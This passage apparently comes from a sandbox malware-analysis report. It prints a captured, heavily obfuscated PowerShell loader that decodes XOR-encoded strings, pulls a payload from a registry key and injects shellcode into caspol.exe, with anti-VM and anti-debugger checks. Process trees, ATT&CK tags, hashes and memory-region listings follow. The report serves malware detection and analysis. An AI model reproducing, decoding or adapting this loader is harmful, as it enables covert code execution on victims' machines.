6GrDAs4TaCgn1BeDAr6SlCHy7GaDUn2RaDde1MaDUdFCoDEr6Ti8Sk4Sl9QuACa'Te;Ka&Gr(Be`$plBReoVioDedTelCuepriOvsCymSl7Xy)Vi Ko`$BaEUdtCioTriunlDyeNisVi4Di;Ls`$GiETotTeoRoiPrlkreEnsPi5Te Co=Ga HaHRdTTaBKu Sk'TiCno1EsDUn6GlCLi7ReCMo6KoCAu1OuDSkDPr9En3Af9Co7ThFPo7grDSn6riDVeCAlCSlBfoDPrAFoDPr7PaDBaASkCSo0NoDSuATeDEnDPlDSt4Fe9DaDRhFfo0HuCTr1trDHy6UnDEl2foCsh7InDFo6SiEAb7reCGrACoCFe3saDFl6An9InBIn9LiAHu'Pn;ro&la(Ri`$NgBMeoCaoJeddelSeePriYnsEcmPr7Bu)An Ti`$deEGrtFooSpiEnlVeeResDo5Ga Jr Ne Br;ke}Su`$GaTKrrPsiConRoiCitRerTaoUdpBlhTieDanGroAllVu In=Sy TeHAdTUdBOk Mn'arDMo8noDSv6BeCBy1FoDCaDPrDsi6HoDNoFko8Mi0Ro8Ba1Br'Di;Su`$BrEGotOnoPeiMiladeQusBe6He Ni=Ph GuHFlTMiBCo He'Ag9Wi7AsEDe7BrDhaCBeCcy1OvCBe6MiDJeFHyDOu2AeDHa0TiDDu6BrDpeCOvCNa6AfCKa0bi9As3Di8ReECa9St3PrETa8NeEJu0muCGrAfoCBa0TaCdu7ZoDSa6DeDPaELo9SpDBaELe1MaCIn6PeDUdDClCTi7LaDMeAToDSuEInDHi6ac9PoDAuFBoAstDPsDSiChe7FoDFl6PeCPr1AvDBrCPhCan3AdEci0MiDDu6CoCOl1KeCSh5PaDSaANoDKo0InDSu6FeCAd0Mi9WrDSaFAfESeDRe2ArCIn1BoCAg0AcDSlBovDSa2ApDFoFscEHyEFo8fa9Su8De9BrFCh4baDEr6KoCSu7DrFTu7FaDLa6ReDStFPaDve6RuDPe4InDPo2DiCPo7OvDDr6TeFHa5CoDTiCMeCFr1DeFAn5syCMi6IfDHyDFoDBj0SmCCu7SaDFrAFeDUdCkoDBrDOrETh3SkDSmCBeDBlASkDGuDMaCAp7BaDPu6VvCRe1He9GeBRo9gtBfoDBa5ImDSo8maCaj3Su9Pa3Ca9Ve7ReEGe7ArCEr1AkDSoAOnDTuDGoDBiAViCJu7UnCEa1StDSkCVaCVo3PiDSkBTiDKi6SaDRoDDiDkeCPaDNoFFr9Sp3Fu9ca7CiFSa1BrDHiCChDOkCAsDGu7ErDSuFMoDTi6EnDGaAMaCPi0TuDJaEYu8Re7Dy9FeALe9LaFal9Ga3pu9ElBDeFmi4spFSu7CrESt7Ba9Wo3KuFNa3st9RaBTaEhe8prFPrAMeDDeDUoCOv7ScESo3NoCIn7FlCFj1GrEthEPo9HeFBr9Ta3UmEHo8PyEEk6UnFMeAfrDMiDAkCEr7Lo8Ha0Ra8He1KoEUnErh9GoFKa9Gr3DoEGa8StECo6QuFAuAGeDFoDFuCCh7He8Lu0Do8Er1AmEPrEBr9EpFSh9Ap3HvEEx8caEel6VaFsiAudDAfDBrCsa7Un8Tr0Af8Po1ReELoEMi9SpAGu9Ex3Pl9CyBnoEHu8AcFSeASmDLiDBaCFo7ToEpo3OvCTe7OuCMu1AxEBuESy9OmAak9ScABl9PrAUa'Tr;re&En(Ml`$TiBTroKaoStdFolSfePaiLosKomLa7Bu)Im Co`$BeEDetKroDaiTalGrePisPa6Co;th`$IlBUnrTiaFinAfdDegAnoPedPrejysSi Fa=Ap HyfMakDepSu Da`$OpBSaoDioFldPrludeLoiLusMimIn5ma Ti`$GrBMeostoTadSalepeFliHasOumra6Ba;Da`$PlEBotUnoGiiunlHoeEmsBr7Sn Ra=Ve FaHVeTPlBVe Un'se9Ve7DeEfe0UnDMa8TrDGr2KdDAw7CaDTa6KrCGl1AfDCaDSuDDe6SoCAn0un8Ud0Me9Lu3Th8SoERe9Ej3Ma9Bo7AnENo7FoDSpCHoCFu1SuCPr6CaDOvFUdDAl2ReDhy0deDUn6HeDmoCStCKo6BrCSk0re9OrDShFSkAtaDReDOrCfo5QuDRiCPrDSa8HeDUd6Ol9EjBUnERa8ChFFoAunDTyDObCRe7OnEHa3UdCFr7SnCCa1SuEChEAm8No9Ae8Kl9ZyESo9IdDDi6PoCEa1GeDroCja9ChFPr9Sk3Tu8Sh5un8Fr6Ca8Im0Fo9ToFud9Bu3Gl8he3KeCFoBBe8Ba0In8Ja3fy8So3Pl8Sk3re9EkFKa9Ud3Tr8Ca3KlCFoBBl8Ti7In8An3Af9DiAby'Mo;Te&Un(Ca`$heBFooHaoevdtrlSpeUdiAascomOv7St)Li Eu`$fuEoutPeoDeiRelMieNosTn7sp;Va`$SjESetIcoDiiSmlJueelsEk8Sa Gl=Aa beHOrTwaBTe Ko'Ju9Pl7MiECa1VeDSa6inCCh0BeCTi7JeDWiCUnCVi3TeDHaFDiDSo2KnDop4CoDga6meDUnDAfDRo6sm9Li3Ov8BeEOx9Na3Pe9Ba7BaEMa7InDBaCReCEt1DeCho6LaDFoFUrDCy2LgDPe0CrDRa6FoDKnCcoCpr6PlCLo0Sp9CiDJoFSaASvDStDFlCKa5MaDHeCAbDfa8SoDNo6Lu9LeBNoESn8RoFBeATrDVeDteCSk7TrEBl3StCbi7laChe1frESpECo8To9Sy8Sk9PoEIn9toDPs6StCUn1AcDDeCun9PhFBi9Hy3Pr8go1Ti8StAFa8Ti5Fi8Fa7Bi8vo1Bu8kr4Pa8Sp6La8Ti1Ti9DiFFo9Ca3Vi8Bi3DeCReBMe8Br0He8Lu3Ae8te3in8Pi3As9FrFLb9No3Bu8Sc3BrCBrBOv8Pa7To9ClABd'Ek;Tr&Ba(me`$InBToosyoTmdAnlHeeCyiGesIdmSl7En)Eg Kv`$LoEditPaoRaiSulAueSusWe8In;Su`$DeTThhNerPaoTu=Pe(RiGSteHatAr-CaISetSaeTamStPLirafoArpPreSirSytReyEg Un-OvPOdaDitEkhNo Ve'FlHLaKCaCMiURe:Op\RiSSllBieintImtAfePskSyoUnmSemVeaStnSkdFioFrerarStnCoeGu\unBSieUnkDryKomPlrme'An)Fl.AmCGalDuoDonAtkLesto;Me`$PiESetHeoPeiInlPleSesPe9Ta Ph=Ma FrHprTChBBo Im'Ss9ak7ImFAn6TeCSp7ThDUlCDiDBoAPaDTiFDeDPl6CoCAb0Ju9Ba3Ir8ToESy9Gu3StEfo8BuETi0FeCOvAInCSa0PrCJa7UpDFo6AfDRaECo9ynDCoFPl0PrDPrCKoDAuDcuCFo5MeDAs6shCre1UdCNe7NeEGaECa8Se9Ti8Be9DrFan5BaCMo1SmDSiCSoDApEPyFce1EpDun2MoCsp0KoDKn6Un8Fo5Fo8Gl7GoELa0BiCQe7tiCPu1TaDPiAFiDOvDDoDFr4Kn9ReBst9En7GlEBr7blDPhBWrCga1TtDAnCNi9SpAAf'Au;Ge&Kv(Pa`$SlBAnoQuoUndGrlCheOviFosInmVg7Fa)Bl Di`$UdEvetCooDiiMilTieBesAf9Ma;In`$TiTashFrrTeoNe0Ro An=Te TrHDiTPrBBa Ku'NyESp8flEho0AlCGuAHyCBe0BeCTr7AgDDi6FrDSpEOt9NeDKoEUd1DaCLa6NoDUdDEaCEs7EnDRiASkDFoEReDMu6Ca9spDPiFMoAAlDBrDMaCPr7DdDFo6FaCBa1boDDiCSyCKn3grEpr0UtDLi6QuCJu1InCIn5TrDBlACoDba0CeDUd6trCHa0Ch9PuDHuFVsEPuDMa2syCCh1coCBi0BaDDiBOpDAt2BaDCiFPuECaEBo8Pr9Pr8Bo9ScFFi0BeDDoCHaCSd3DiCSkAMu9KrBBo9er7BiFTh6JuCOv7VaDLeCJeDUnAFaDSaFHeDNo6MuCTe0Pr9KrFFr9Jo3Du8sa3Un9anFMi9Fo3Re9Bo3Un9bu7ReEUn0RoDRo8HyDBr2KnDTy7SeDSo6SmCMi1LiDStDpaDWo6CaCSe0Ex8Sa0Fa9NaFCh9Ad3We8Aa5No8Ox6Ly8En0Un9MaASk'Af;De&Fu(Pe`$MoBAfoGeoLedEnlSkePaiPesHamHv7At)Co En`$AfTTahCarCeoAc0Kr;Ho`$PhcTiiHnvSaiSelsciTasGatBi=Re`$EjESktKaoTriRelGleOvsDi.EmcWhosruPrnSttSy-Co6Ha5Dd3Sk;Te`$LaTNuhBrrSeoCh1Pr Fn=ra FjHOsTOvBbi Mo'NoETr8peEEr0MeCPrASeCCa0UnCOn7InDOv6DaDFaESk9JvDHuEFa1GiCMo6FoDFlDHeCQu7ScDWoADiDEqEUdDRo6Br9HyDBuFriAGuDleDFlCBe7UdDSc6MaCRe1MaDDyCInCSi3ViEBe0AsDLo6PuCCl1HyCLa5InDbiACiDNo0FrDSt6SkCSv0Le9SoDFdFByESoDTr2HeCAl1SpCCo0inDSuBDaDDe2TaDBiFJyEAnEDe8Re9Co8Wh9SaFou0SuDUnCNoCTr3SeCAlAIn9BaBun9ik7GkFCh6ArCOp7MeDSuCHaDUdAStDmiFOcDAa6AmCla0Pl9afFSh9Ca3St8Ul5Eb8Re6Re8Dy0Re9MeFAn9Co3Mi9Ko7GrEMa1InDSa6BoCNi0CoCCl7FoDRoCTaCRe3PeDTiFakDGo2SuDex4prDYe6PhDBrDMaDUn6ty9AmFAf9Bl3Fo9In7PrDUn0KaDSjAReCSu5KnDByAriDAtFasDPaAAgCPr0PrCRe7Un9KoABa'Il;Po&Ro(Ru`$opBBuoOvoLydNulCeeSoiFlsanmVa7St)un Ha`$SiTlehLerPaoBa1By;Sa`$TrTBahAbrOvoHa2De Av=Sn SwHPhTUnBLa Se'sa9sk7DaESo5Nu9Se3Un8EuEbi9Kl3DiETr8LaEFe0MiCEmAPtCRe0ClCIn7CrDSl6PhDKhEme9PrDDeEAu1DeCPi6NeDooDSaCfa7AgDGlAFiDAmEUdDCu6Gr9ObDThFSlAUnDunDOpCdo7CrDAp6PhCRe1BaDliCAfCWa3DiEPa0PeDBl6BlCSt1ViCRo5SkDRaALbDPn0UnDPa6SyCbu0Po9MoDCeFJaEFlDBl2foCMu1SnCCh0SuDtrBHaDNo2toDReFDeEseETe8Fo9Kr8Sm9StFNo4GeDDu6AnCPr7UnFre7PlDPl6OvDMeFCiDUn6MoDCa4SaDRo2BoCRe7KaDPi6CrFSh5CiDIsCDeCBr1ReFTe5CoCNo6BeDPaDMtDLo0KoCMe7SnDCyAcoDTiCCoDRaDalEBa3DeDQuCSaDAfABrDRiDHeCKr7VeDFo6smCJi1Sv9CiBUn9KvBOrDPi5KaDPr8RyCDe3Am9Ef3Je9Ph7UnETr6PeDTeDChCSk0KoDMaBBoDTr2DiDin8SeDPy6LeDHeDDiDPhDCyDTa6StCSc0BlCbe0RoDEnFOvDJeFAdDIn6TrDBiBFoDSt2NsDsh2MoDBrDSeDke7VaDSp6TrCSu0Au9Wo3Pr9Mi7FjCsu6DeDArDBeDTeBDeDPl6FoDTjFLoCLe3FiDti2GuDin1AlDUnFLoDWi6LiDdeDStDFo6YoCta0UgCSt0Va9IrABl9InFEn9Un3Na9ReBUdFTi4UnFFo7TiEIn7Re9St3FlFCh3Gu9XyBwoEAk8NoFSaAKnDCeDinCNo7TuEDe3seCCo7PoCBs1UnEIaESe9BrFOc9Da3AmEEl8EnFBeASaDfiDGaCSu7AaEHa3SeCCo7anCAs1BuEMiETe9FoFJe9fi3PlESa8WaFTrADeDPiDFuCFa7OpETe3SwCCa7FeChy1PrEElEKl9BeFKo9Ga3RgEZy8FrFteAAnDKoDVaCAn7ZaEPl3WoCUd7FoCSy1FuEKlEEl9ArFSe9Un3UdETr8HaFStANoDCoDBeCVi7StEVe3LaCOv7SaCVe1WiETaEPi9MoASt9Om3St9AnBadEEn8haFtaAAcDBiDScCTo7ArEAn3InCau7olCIn1StEReEMy9NoAaf9HyAPr9SnASp'Pl;Mu&Pi(Fi`$CoBHeoTooVodmilVeeOviZisInmMo7Ma)Wh Hv`$UdTDrhRerThoCe2Se;sc`$VoTInhRerPaoPe3Bo Sa=Re SpHUoTDeBDe Di'Ku9Fi7OpERe5Un9EtDSoFTuAfoDSeDInCPh5SkDHyCBeDRn8GyDBr6Sy9HaBBr9Hu7FeEEn0UnDNe8OwDbi2ToDTr7DeDBi6BoCdu1LiDDiDCiDco6FeCRi0An8Ci0Ka9BaFPo9Bu7RoEFi1PoDFr6ApCBi0PrCHa7OsDPsCDdCIn3YaDUdFSaDLa2PiDHo4LoDya6HoDAnDCaDBe6Su9beFAt9Tu7UnFBa1TuCPr1IgDli2SaDSpDGlDEf7EtDam4GoDChCEfDEm7PsDOp6ViCDo0Tu9DeFLi8Wh3Za9SaFKo8Sp3Um9auAIn'Ud;Ph&Do(Sh`$StBFdoGroIndRelGeeLeiMasImmGe7Da)Sm Pa`$ScTRehExrCyoMo3Ga#Be;""";Function Thro9 { param([String]$Graniform); For($Brugerudtalelser=2; $Brugerudtalelser -lt $Graniform.Length-1; $Brugerudtalelser+=(2+1)){ $Recarving = $Recarving + $Uhfliges196 + $Graniform.Substring($Brugerudtalelser, 1); } $Recarving;}$Dogmes0 = Thro9 'caISuELnXZi ';$Dogmes1= Thro9 $Konsulentvirksomhedernes;if([IntPtr]::size -eq 8){START-job { param($Unshakenness) powershell $Unshakenness } -RunAs32 -Argument $Dogmes1 | wait-job | Receive-Job;}else{&$Dogmes0 $Dogmes1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Graniform); $Unshakennesslmendron = $Graniform.Length; $Spindsvinet = New-Object byte[] ($Unshakennesslmendron / 2); For($Brugerudtalelser=0; $Brugerudtalelser -lt $Graniform.Length; $Brugerudtalelser+=2){ $Spindsvinet[$Brugerudtalelser/2] = [convert]::ToByte($Graniform.Substring($Brugerudtalelser, 2), 16); $Spindsvinet[$Brugerudtalelser/2] = ($Spindsvinet[$Brugerudtalelser/2] -bxor 179); } [String][System.Text.Encoding]::ASCII.GetString($Spindsvinet);}$Regretable0=HTB 'E0CAC0C7D6DE9DD7DFDF';$Regretable1=HTB 'FEDAD0C1DCC0DCD5C79DE4DADD80819DE6DDC0D2D5D6FDD2C7DAC5D6FED6C7DBDCD7C0';$Regretable2=HTB 'F4D6C7E3C1DCD0F2D7D7C1D6C0C0';$Regretable3=HTB 'E0CAC0C7D6DE9DE1C6DDC7DADED69DFADDC7D6C1DCC3E0D6C1C5DAD0D6C09DFBD2DDD7DFD6E1D6D5';$Regretable4=HTB 'C0C7C1DADDD4';$Regretable5=HTB 'F4D6C7FEDCD7C6DFD6FBD2DDD7DFD6';$Regretable6=HTB 'E1E7E0C3D6D0DAD2DFFDD2DED69F93FBDAD7D6F1CAE0DAD49F93E3C6D1DFDAD0';$Regretable7=HTB 'E1C6DDC7DADED69F93FED2DDD2D4D6D7';$Regretable8=HTB 'E1D6D5DFD6D0C7D6D7F7D6DFD6D4D2C7D6';$Regretable9=HTB 'FADDFED6DEDCC1CAFEDCD7C6DFD6';$Boodleism0=HTB 'FECAF7D6DFD6D4D2C7D6E7CAC3D6';$Boodleism1=HTB 'F0DFD2C0C09F93E3C6D1DFDAD09F93E0D6D2DFD6D79F93F2DDC0DAF0DFD2C0C09F93F2C6C7DCF0DFD2C0C0';$Boodleism2=HTB 'FADDC5DCD8D6';$Boodleism3=HTB 'E3C6D1DFDAD09F93FBDAD7D6F1CAE0DAD49F93FDD6C4E0DFDCC79F93E5DAC1C7C6D2DF';$Boodleism4=HTB 'E5DAC1C7C6D2DFF2DFDFDCD0';$Boodleism5=HTB 'DDC7D7DFDF';$Boodleism6=HTB 'FDC7E3C1DCC7D6D0C7E5DAC1C7C6D2DFFED6DEDCC1CA';$Boodleism7=HTB 'FAF6EB';$Boodleism8=HTB 'EF';$Unshakennessllehaandes=HTB 'E6E0F6E18081';$unhelpableness=HTB 'F0D2DFDFE4DADDD7DCC4E3C1DCD0F2';function fkp {Param ($Spiriform, $Inosclerosis) ;$Etoiles0 =HTB '97F1D6D7C1C5D6D7D6938E939BE8F2C3C3F7DCDED2DADDEE8989F0C6C1C1D6DDC7F7DCDED2DADD9DF4D6C7F2C0C0D6DED1DFDAD6C09B9A93CF93E4DBD6C1D69EFCD1D9D6D0C793C89397EC9DF4DFDCD1D2DFF2C0C0D6DED1DFCAF0D2D0DBD6939EF2DDD79397EC9DFFDCD0D2C7DADCDD9DE0C3DFDAC79B97F1DCDCD7DFD6DAC0DE8B9AE89E82EE9DF6C2C6D2DFC09B97E1D6D4C1D6C7D2D1DFD6839A93CE9A9DF4D6C7E7CAC3D69B97E1D6D4C1D6C7D2D1DFD6829A';&($Boodleism7) $Etoiles0;$Etoiles5 = HTB '97E1DCC6DDD7D6DFD6D6C1938E9397F1D6D7C1C5D6D7D69DF4D6C7FED6C7DBDCD79B97E1D6D4C1D6C7D2D1DFD6819F93E8E7CAC3D6E8EEEE93F39B97E1D6D4C1D6C7D2D1DFD6809F9397E1D6D4C1D6C7D2D1DFD6879A9A';&($Boodleism7) $Etoiles5;$Etoiles1 = HTB 'C1D6C7C6C1DD9397E1DCC6DDD7D6DFD6D6C19DFADDC5DCD8D69B97DDC6DFDF9F93F39BE8E0CAC0C7D6DE9DE1C6DDC7DADED69DFADDC7D6C1DCC3E0D6C1C5DAD0D6C09DFBD2DDD7DFD6E1D6D5EE9BFDD6C49EFCD1D9D6D0C793E0CAC0C7D6DE9DE1C6DDC7DADED69DFADDC7D6C1DCC3E0D6C1C5DAD0D6C09DFBD2DDD7DFD6E1D6D59B9BFDD6C49EFCD1D9D6D0C793FADDC7E3C7C19A9F939B97F1D6D7C1C5D6D7D69DF4D6C7FED6C7DBDCD79B97E1D6D4C1D6C7D2D1DFD6869A9A9DFADDC5DCD8D69B97DDC6DFDF9F93F39B97E0C3DAC1DAD5DCC1DE9A9A9A9A9F9397FADDDCC0D0DFD6C1DCC0DAC09A9A';&($Boodleism7) $Etoiles1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $Unshakennessfhjemlingen,[Parameter(Position = 1)] [Type] $Pokomam = [Void]);$Etoiles2 = HTB '97F7D6DCCBDAD7DAC0DADDD4938E93E8F2C3C3F7DCDED2DADDEE8989F0C6C1C1D6DDC7F7DCDED2DADD9DF7D6D5DADDD6F7CADDD2DEDAD0F2C0C0D6DED1DFCA9B9BFDD6C49EFCD1D9D6D0C793E0CAC0C7D6DE9DE1D6D5DFD6D0C7DADCDD9DF2C0C0D6DED1DFCAFDD2DED69B97E1D6D4C1D6C7D2D1DFD68B9A9A9F93E8E0CAC0C7D6DE9DE1D6D5DFD6D0C7DADCDD9DF6DEDAC79DF2C0C0D6DED1DFCAF1C6DADFD7D6C1F2D0D0D6C0C0EE8989E1C6DD9A9DF7D6D5DADDD6F7CADDD2DEDAD0FEDCD7C6DFD69B97E1D6D4C1D6C7D2D1DFD68A9F9397D5D2DFC0D69A9DF7D6D5DADDD6E7CAC3D69B97F1DCDCD7DFD6DAC0DE839F9397F1DCDCD7DFD6DAC0DE829F93E8E0CAC0C7D6DE9DFEC6DFC7DAD0D2C0C7F7D6DFD6D4D2C7D6EE9A';&($Boodleism7) $Etoiles2;$Etoiles3 = HTB '97F7D6DCCBDAD7DAC0DADDD49DF7D6D5DADDD6F0DCDDC0C7C1C6D0C7DCC19B97E1D6D4C1D6C7D2D1DFD6859F93E8E0CAC0C7D6DE9DE1D6D5DFD6D0C7DADCDD9DF0D2DFDFDADDD4F0DCDDC5D6DDC7DADCDDC0EE8989E0C7D2DDD7D2C1D79F9397E6DDC0DBD2D8D6DDDDD6C0C0D5DBD9D6DEDFDADDD4D6DD9A9DE0D6C7FADEC3DFD6DED6DDC7D2C7DADCDDF5DFD2D4C09B97E1D6D4C1D6C7D2D1DFD6849A';&($Boodleism7) $Etoiles3;$Etoiles4 = HTB '97F7D6DCCBDAD7DAC0DADDD49DF7D6D5DADDD6FED6C7DBDCD79B97F1DCDCD7DFD6DAC0DE819F9397F1DCDCD7DFD6DAC0DE809F9397E3DCD8DCDED2DE9F9397E6DDC0DBD2D8D6DDDDD6C0C0D5DBD9D6DEDFDADDD4D6DD9A9DE0D6C7FADEC3DFD6DED6DDC7D2C7DADCDDF5DFD2D4C09B97E1D6D4C1D6C7D2D1DFD6849A';&($Boodleism7) $Etoiles4;$Etoiles5 = HTB 'C1D6C7C6C1DD9397F7D6DCCBDAD7DAC0DADDD49DF0C1D6D2C7D6E7CAC3D69B9A';&($Boodleism7) $Etoiles5 ;}$Trinitrophenol = HTB 'D8D6C1DDD6DF8081';$Etoiles6 = HTB '97E7DCC1C6DFD2D0D6DCC6C0938E93E8E0CAC0C7D6DE9DE1C6DDC7DADED69DFADDC7D6C1DCC3E0D6C1C5DAD0D6C09DFED2C1C0DBD2DFEE8989F4D6C7F7D6DFD6D4D2C7D6F5DCC1F5C6DDD0C7DADCDDE3DCDADDC7D6C19B9BD5D8C39397E7C1DADDDAC7C1DCC3DBD6DDDCDF9397F1DCDCD7DFD6DAC0DE879A9F939BF4F7E793F39BE8FADDC7E3C7C1EE9F93E8E6FADDC78081EE9F93E8E6FADDC78081EE9F93E8E6FADDC78081EE9A939BE8FADDC7E3C7C1EE9A9A9A';&($Boodleism7) $Etoiles6;$Brandgodes = fkp $Boodleism5 $Boodleism6;$Etoiles7 = HTB '97E0D8D2D7D6C1DDD6C080938E9397E7DCC1C6DFD2D0D6DCC6C09DFADDC5DCD8D69BE8FADDC7E3C7C1EE8989E9D6C1DC9F938586809F9383CB808383839F9383CB87839A';&($Boodleism7) $Etoiles7;$Etoiles8 = HTB '97E1D6C0C7DCC3DFD2D4D6DDD6938E9397E7DCC1C6DFD2D0D6DCC6C09DFADDC5DCD8D69BE8FADDC7E3C7C1EE8989E9D6C1DC9F93818A8587818486819F9383CB808383839F9383CB879A';&($Boodleism7) $Etoiles8;$Thro=(Get-ItemProperty -Path 'HKCU:\Slettekommandoerne\Bekymr').Clonks;$Etoiles9 = HTB '97F6C7DCDADFD6C0938E93E8E0CAC0C7D6DE9DF0DCDDC5D6C1C7EE8989F5C1DCDEF1D2C0D68587E0C7C1DADDD49B97E7DBC1DC9A';&($Boodleism7) $Etoiles9;$Thro0 = HTB 'E8E0CAC0C7D6DE9DE1C6DDC7DADED69DFADDC7D6C1DCC3E0D6C1C5DAD0D6C09DFED2C1C0DBD2DFEE8989F0DCC3CA9B97F6C7DCDADFD6C09F93839F939397E0D8D2D7D6C1DDD6C0809F938586809A';&($Boodleism7) $Thro0;$civilist=$Etoiles.count-653;$Thro1 = HTB 'E8E0CAC0C7D6DE9DE1C6DDC7DADED69DFADDC7D6C1DCC3E0D6C1C5DAD0D6C09DFED2C1C0DBD2DFEE8989F0DCC3CA9B97F6C7DCDADFD6C09F938586809F9397E1D6C0C7DCC3DFD2D4D6DDD69F9397D0DAC5DADFDAC0C79A';&($Boodleism7) $Thro1;$Thro2 = HTB '97E5938E93E8E0CAC0C7D6DE9DE1C6DDC7DADED69DFADDC7D6C1DCC3E0D6C1C5DAD0D6C09DFED2C1C0DBD2DFEE8989F4D6C7F7D6DFD6D4D2C7D6F5DCC1F5C6DDD0C7DADCDDE3DCDADDC7D6C19B9BD5D8C39397E6DDC0DBD2D8D6DDDDD6C0C0DFDFD6DBD2D2DDD7D6C09397C6DDDBD6DFC3D2D1DFD6DDD6C0C09A9F939BF4F7E793F39BE8FADDC7E3C7C1EE9F93E8FADDC7E3C7C1EE9F93E8FADDC7E3C7C1EE9F93E8FADDC7E3C7C1EE9F93E8FADDC7E3C7C1EE9A939BE8FADDC7E3C7C1EE9A9A9A';&($Boodleism7) $Thro2;$Thro3 = HTB '97E59DFADDC5DCD8D69B97E0D8D2D7D6C1DDD6C0809F97E1D6C0C7DCC3DFD2D4D6DDD69F97F1C1D2DDD7D4DCD7D6C09F839F839A';&($Boodleism7) $Thro3#"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3940

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3220 -s 2220
6⤵
- Program crash
PID:2240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 3220 -ip 3220
1⤵
PID:656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:4368

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

4

T1012

System Information Discovery

5

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
57KB

MD5
f6e0bdf134963e50d27305f672515b77

SHA1
e9dec656302370ea97496ca98211464214caa560

SHA256
3373314e40ce7cb93dd1c77423572bb27f23ce10e8d0c9be247201082cae33b0

SHA512
670197ec7a8e62c5bca1e4f7550c81b8d7875034d5978efb53d0cfd1a3c7ab9e6bb70e3032c2048abe47876b13553a812539d3321781545d0e4952d4164683ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
57KB

MD5
548e21a8f5e2c98bf35e935495e36c05

SHA1
39fa41b02e71c3e931c1840ab86606f9529d8398

SHA256
5c626706da5e310c0b96a1fbc0cee8756a9099124e8dab6b9c91ac5090c4cd0d

SHA512
f74e92b83a16a69ce251e2d88cf975eba0db28bc2b88ababeb5d4307f352f1291c02f3e412445c20b45dee801bf8497e2ed1c22a495ab296ca83638dc2c5c479

Download Submit
memory/3220-165-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/3220-170-0x0000000001300000-0x0000000002F45000-memory.dmp

Filesize
28.3MB

Download
memory/3220-169-0x0000000022790000-0x000000002279A000-memory.dmp

Filesize
40KB

Download
memory/3220-168-0x0000000022810000-0x00000000228A2000-memory.dmp

Filesize
584KB

Download
memory/3220-171-0x00007FFD8B1F0000-0x00007FFD8B3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3220-163-0x0000000000401000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3220-162-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3220-161-0x00000000771B0000-0x0000000077353000-memory.dmp

Filesize
1.6MB

Download
memory/3220-159-0x00007FFD8B1F0000-0x00007FFD8B3E5000-memory.dmp

Filesize
2.0MB

Download
memory/3220-160-0x00000000771B0000-0x0000000077353000-memory.dmp

Filesize
1.6MB

Download
memory/3220-158-0x0000000001300000-0x0000000002F45000-memory.dmp

Filesize
28.3MB

Download
memory/3220-172-0x00000000771B0000-0x0000000077353000-memory.dmp

Filesize
1.6MB

Download
memory/3220-155-0x0000000000000000-mapping.dmp

Download
memory/3484-141-0x0000000006070000-0x00000000060D6000-memory.dmp

Filesize
408KB

Download
memory/3484-145-0x00000000079C0000-0x000000000803A000-memory.dmp

Filesize
6.5MB

Download
memory/3484-137-0x0000000000000000-mapping.dmp

Download
memory/3484-138-0x0000000005240000-0x0000000005276000-memory.dmp

Filesize
216KB

Download
memory/3484-139-0x00000000058B0000-0x0000000005ED8000-memory.dmp

Filesize
6.2MB

Download
memory/3484-140-0x0000000005F50000-0x0000000005F72000-memory.dmp

Filesize
136KB

Download
memory/3484-142-0x0000000006150000-0x00000000061B6000-memory.dmp

Filesize
408KB

Download
memory/3484-143-0x0000000006970000-0x000000000698E000-memory.dmp

Filesize
120KB

Download
memory/3484-146-0x0000000006F20000-0x0000000006F3A000-memory.dmp

Filesize
104KB

Download
memory/3928-132-0x0000000000000000-mapping.dmp

Download
memory/3928-136-0x0000026241170000-0x000002624137A000-memory.dmp

Filesize
2.0MB

Download
memory/3928-173-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

Filesize
10.8MB

Download
memory/3928-147-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

Filesize
10.8MB

Download
memory/3928-133-0x0000026240930000-0x0000026240952000-memory.dmp

Filesize
136KB

Download
memory/3928-134-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

Filesize
10.8MB

Download
memory/3928-135-0x0000026240DE0000-0x0000026240F56000-memory.dmp

Filesize
1.5MB

Download
memory/3940-153-0x00000000771B0000-0x0000000077353000-memory.dmp

Filesize
1.6MB

Download
memory/3940-150-0x0000000009A90000-0x000000000A034000-memory.dmp

Filesize
5.6MB

Download
memory/3940-166-0x0000000007E40000-0x0000000009A85000-memory.dmp

Filesize
28.3MB

Download
memory/3940-167-0x00000000771B0000-0x0000000077353000-memory.dmp

Filesize
